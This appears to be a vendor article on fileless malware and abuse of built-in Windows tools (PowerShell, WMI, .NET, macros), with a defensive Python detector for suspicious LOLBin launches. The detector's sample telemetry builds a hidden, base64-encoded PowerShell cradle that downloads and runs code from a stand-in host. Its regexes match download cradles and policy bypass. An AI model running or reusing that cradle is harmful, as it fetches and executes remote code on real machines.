Fileless Malware: When Windows Turns On Itself
Fileless malware is a form of attack against Windows and other operating systems that evades detection by traditional antivirus or endpoint protection products. This article describes the threat and recommends next steps for prevention and remediation of such attacks.
As endpoint security tools become more effective at stopping malware embedded within executable or opened files, attackers have developed new vectors into the enterprise. One example of this is fileless malware: a form of attack against Windows and other operating systems that evades detection with traditional antivirus or endpoint protection products.
What is fileless malware?
In file-based attacks, a binary payload is downloaded onto the target machine and executed to carry out malicious actions. Legacy antivirus can prevent these known attacks by identifying the signature of the malware and comparing it to a database of known malware. If the signature is found, the antivirus prevents it.
Fileless malware attacks turn this idea on its head by presenting no indicators of malicious executables on the target machine. Instead, attackers use legitimate tools built into the system like PowerShell, WMI, Microsoft Office Macros and .NET for malicious purposes. Essentially, Windows is turned against itself.
Fileless attacks can be a powerful tool for attackers, since they are able to bypass the majority of antivirus and next-generation antivirus products. Though fileless attacks have been discussed in mainstream circles since the early 1990s, these attack vectors are still gaining popularity.
And the data proves it. In Q1 2018, fileless attacks were up 94 percent. In 2018, 42 out of every 1,000 endpoint attacks used fileless malware. To put that into perspective, ransomware maxed out at 14.4 out of every 1,000 endpoint attacks.
In The State of Endpoint Security, The Ponemon Institute found respondents believe 38 percent of all attacks targeting their company will be fileless in 2019. With the growing use of this kind of attack, all enterprises should be aware of what fileless malware can look like and how to combat it.
Living off the Land
Using legitimate tools for malicious purposes is a technique called Living off the Land that has been around for at least twenty-five years. Fileless malware leverages trusted, legitimate processes running on the operating system to perform malicious activities like lateral movement, privilege escalation, evasion, reconnaissance and the delivery of payloads.
The abused, legitimate tools are known as LOLBins and can include Microsoft Office Macros, PowerShell, WMI and many more system tools. In fact, there are more than 100 Windows system tools that can be leveraged in this technique.
PowerShell is a cross-platform, open source task automation and configuration management framework created by Microsoft to automate common tasks. It is a saving grace for administrators to automate tedious, repetitive tasks on a daily basis, which makes it nearly impossible to blocklist. PowerShell is very commonly used as a LOLBin by attackers because it evades traditional antivirus.
PowerShell is powerful. You can use PowerShell to display all installed USB devices on all computers on the network. You can use it to set a task running in the background. You can use it to kill processes or export information about a machine. This is what makes PowerShell so critical for IT administrators: they can automate away much of their routine work and focus on other tasks.
Windows Management Instrumentation (WMI) is a Microsoft standard for accessing management information about devices in an enterprise environment. WMI has been ingrained in the Windows operating system since Windows NT 4.0 and Windows 95.
WMI is all about the management of Windows devices on a network. It can give you information about the status of local or remote machines and can be used to configure security settings like system properties, user groups, scheduling processes or disabling error logging.
WMI is valuable to administrators who need to easily manage all machines on the network — a task that happens regularly in an enterprise. This management is critical for the success of an IT department, which also makes it impossible to remove from their day-to-day life.
.NET is a framework built by Microsoft to develop a wide range of applications. It gives access to an infrastructure of functions that developers use frequently and can build off of. It is used with several programming languages, including C#, VB.NET, C++ and F#. It can be used to create Windows-based applications, cloud applications, artificial intelligence applications or even cross-platform applications.
.NET is an effective technique for malware authors to leverage, since applications that use .NET save developers time by giving them easy access to core machine functionality, and can be run on multiple platforms and architectures.
It’s important to note that .NET is not really a tool, but rather a technique. Attackers use .NET APIs that are available in Windows systems to execute their malicious code.
In Microsoft Office, Macros are used to automate frequent tasks. They are typically created in Word documents or Excel spreadsheets as a series of commands grouped together to complete a task automatically. Many macros are made using Visual Basic for Applications and can be written by anyone, including software developers.
Using macros for fileless attacks is convenient, since they can easily be combined with phishing to trick a user into downloading and running a secretly malicious file. In an enterprise, receiving a Word document is a common occurrence, and most individuals would not think twice about opening it. In the case of a malicious Word document, this results in an attack.
It’s important to note that Microsoft has added protections to restrict or even block Macros. However, these protections are not often implemented or are easily bypassed by attackers or users.
Widespread fileless attacks
The Cybereason research team has come across and prevented or detected many cases of fileless attacks in 2019 alone. It has seen that attackers use a range of default Windows processes in their attacks, including:
- PowerShell: with attacks like Operation Cobalt Kitty, the Ramnit Banking Trojan, the Triple Threat of Emotet, TrickBot, Ryuk and the Fallout Exploit Kit
- Windows Management Instrumentation (WMI): with attacks like Operation Soft Cell, the Shade Exploit Kit, Adobe Worm Faker and GandCrab's Evasive Infection Chain
- .NET: with attacks like the New Ursnif Variant
- Malicious Macros: with attacks like the New Ursnif Variant
You can learn about all these and more on Cybereason's blog. Take note: this is far from an exhaustive list of processes used for fileless attacks. However, we want to point out these cases that, with proper defense, could be prevented before any damage takes place.
Fileless malware is hard to detect
Fileless malware depends on tools that are part of the daily workflow of enterprise professionals. Attackers know they can rely on a set of tools that are pre-installed on every Windows machine and are vital for the daily operations of the enterprise. Fileless malware also decreases the number of files on disk, which means signature-based prevention and detection methods will not be able to identify them.
This makes it incredibly difficult for an analyst or security product to identify whether the tool is being used for malicious purposes or normal, day-to-day actions. Analysts must have an intimate understanding of their environment to be able to identify LOLBins at work.
This is one reason why fileless malware attacks have become so prevalent. We only expect them to become more common as attackers continue to iterate and share their techniques with the community, and as they potentially develop this malware for profit under a malware-as-a-service model.
Why attackers love fileless malware
Many LOLBins are incorporated into the daily workflow of IT professionals, which, again, makes blocklisting them impractical given how it would reduce IT's efficiency and reach. Naturally, the tools with the most power, reach and ubiquity become the most common tools for attackers to leverage.
This means Windows toolkits are the most attractive, since they include tools and suites like PowerShell, WMI and Office by default. The attackers know they have a set of tools they can leverage that are not only pre-installed on every Windows machine they want to target, but are also vital to the organization and cannot be shut down.
Fileless malware also decreases the number of files on disk and the number of actions an attacker has to take to execute an attack. Further, in order to identify this type of attack, security tools have to focus on something other than signatures: how the tools are accessed, what they do and what users spawn. This is not the way traditional security tools like antivirus operate.
This makes defense much more difficult. To face this, a new form of prevention and new types of telemetry for detection that can handle these attacks must enter the picture.
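The two points above, that a macro-laden document can launch PowerShell on the user's behalf and that detection must look at how built-in tools are launched rather than at file signatures, can be made concrete with a small triage routine over process-creation telemetry. The following is an added example written for this article, not code from WWT or Cybereason. It assumes event records shaped loosely like Sysmon Event ID 1 (image, parent image, command line, user); the four records, the `CORP\` user names and the `example.invalid` URL are constructed sample data, and the lists of Office parents, LOLBins and command-line features are illustrative rather than complete.

```python
"""Flag LOLBin launches by parent process and command-line shape (added example, constructed data)."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Parent processes whose LOLBin children deserve scrutiny (illustrative, not exhaustive).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# On Windows, processes created through WMI (Win32_Process.Create) run under WmiPrvSE.exe.
WMI_HOST = "wmiprvse.exe"
# Built-in tools commonly abused in fileless attacks (illustrative, not exhaustive).
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "cscript.exe", "wscript.exe"}

# Command-line features that separate scripted admin use from attack-style launches.
# PowerShell accepts any unambiguous prefix of a parameter name, hence the alternations.
SUSPICIOUS_FLAGS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile skipped"),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I)


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str | None:
    """Return the -EncodedCommand payload decoded as UTF-16LE (what PowerShell expects), else None."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64, or odd byte count / not UTF-16
        return None


def analyze_event(ev: ProcEvent) -> list[str]:
    """Reasons this event looks like a LOLBin abuse; empty list means nothing noteworthy."""
    reasons: list[str] = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image not in LOLBINS:
        return reasons
    if parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office application {parent}")
    if parent == WMI_HOST:
        reasons.append(f"{image} spawned via WMI host {parent}")
    cmd = ev.command_line
    for pattern, label in SUSPICIOUS_FLAGS:
        if pattern.search(cmd):
            reasons.append(label)
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = f"{cmd} {decoded}"   # inspect the decoded script as well as the visible command line
    if CRADLE_RE.search(cmd):
        reasons.append("download/eval cradle")
    return reasons


def triage(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Keep only events with at least one reason, most reasons first."""
    hits = [(ev, analyze_event(ev)) for ev in events]
    return sorted([(ev, r) for ev, r in hits if r], key=lambda pair: len(pair[1]), reverse=True)


# Constructed sample telemetry. The encoded script is built here so the sample is self-consistent.
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_ENCODED = base64.b64encode(STAGE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r"powershell.exe -File C:\Scripts\Get-UsbDevices.ps1", r"CORP\admin"),          # routine admin use
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              f"powershell.exe -nop -w hidden -enc {_ENCODED}", r"CORP\jdoe"),                 # macro-launched
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File \\share\deploy.ps1", r"CORP\svc-deploy"),  # via WMI
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe", r"CORP\jdoe"),
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(f"{ev.user}: {basename(ev.image)} <- {basename(ev.parent_image)}: {', '.join(reasons)}")
```

The admin's scripted PowerShell run produces no reasons at all, which is the point: the same binary is benign or hostile depending on who launched it and how, so the rule keys on parent process and command-line shape, and decodes `-EncodedCommand` so that a download cradle hidden inside base64 is inspected like any other command line. In production the same logic would consume Sysmon or EDR process-creation events, and the parent and flag lists would be tuned to the environment, as the article's point about knowing your own environment implies.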
How we can help
WWT offers a variety of high-value workshops and conversation accelerators to help you improve your endpoint security posture, regardless of the starting point. These include:
- Cyber Posture Assessment (delivered with Cybereason): A low-overhead assessment of your endpoint security infrastructure developed to provide actionable intelligence about your existing security ops programs and an in-depth assessment of your overall breach readiness
- Security Tools Rationalization Workshop: A 2-8 hour on-site workshop to assess whether your organization has the pervasive enterprise visibility, granular security control and rapid response capabilities required to deliver secure business outcomes (commercial) and mission success (federal)
- Endpoint Security Workshop: An on-site workshop to provide a customized endpoint assessment that enables you to understand emerging threats and develop an endpoint security strategy for next-gen malware and ransomware